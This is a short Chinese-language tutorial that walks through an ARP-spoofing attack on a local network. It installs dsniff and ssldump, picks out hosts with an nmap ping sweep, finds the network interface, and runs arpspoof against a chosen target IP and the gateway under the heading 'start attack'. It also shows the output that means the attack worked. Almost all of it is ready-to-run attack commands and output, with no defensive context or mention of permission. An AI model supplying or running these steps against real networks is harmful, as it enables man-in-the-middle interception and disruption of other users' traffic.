1 安装软件包
在中端中执行:
apt install dsniff ssldump
2 搜索局域网内的ip地址:
nmap -sn 192.168.0.*
这里的192.168.0.*有的是192.168.1.*
执行结果:
Nmap scan report for 192.168.0.1
Host is up (0.00054s latency).
MAC Address: -:-:-:-:-:- (Tp-link Technologies)
#以上是第一个设备
Nmap scan report for 192.168.0.103
Host is up (0.11s latency).
MAC Address: -:-:-:-:-:- (Unknown)
#第二个设备
3 查看网卡信息
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.0.108 netmask 255.255.255.0 broadcast 192.168.0.255
inet6 fe80::4216:7eff:feac:e956 prefixlen 64 scopeid 0x20<link>
ether -:-:-:-:-:- txqueuelen 1000 (Ethernet)
RX packets 252997 bytes 328230065 (313.0 MiB)
RX errors 0 dropped 5 overruns 0 frame 0
TX packets 128705 bytes 13802826 (13.1 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 12 bytes 600 (600.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 12 bytes 600 (600.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
记住这个eth0 (有线网),有的时候还可能是wlan0 (无线网)
4 开始攻击
假设我要攻击的设备的ip是 192.168.0.103
在中端中输入:
arpspoof -i eth0 -t 192.168.0.103 -r 192.168.0.1
#格式 arpspoof -i eth0/wlan0 -t 要攻击的ip -r 192.168.0.1
如果有下面这样的输出那么就成功了
40:16:7e:ac:e9:56 0:0:0:0:0:0 0806 42: arp reply 192.168.0.1 is-at 40:16:7e:ac:e9:56
40:16:7e:ac:e9:56 60:3a:7c:30:aa:3 0806 42: arp reply 192.168.0.3 is-at 40:16:7e:ac:e9:56
40:16:7e:ac:e9:56 0:0:0:0:0:0 0806 42: arp reply 192.168.0.1 is-at 40:16:7e:ac:e9:56
按 Ctrl + C 停止攻击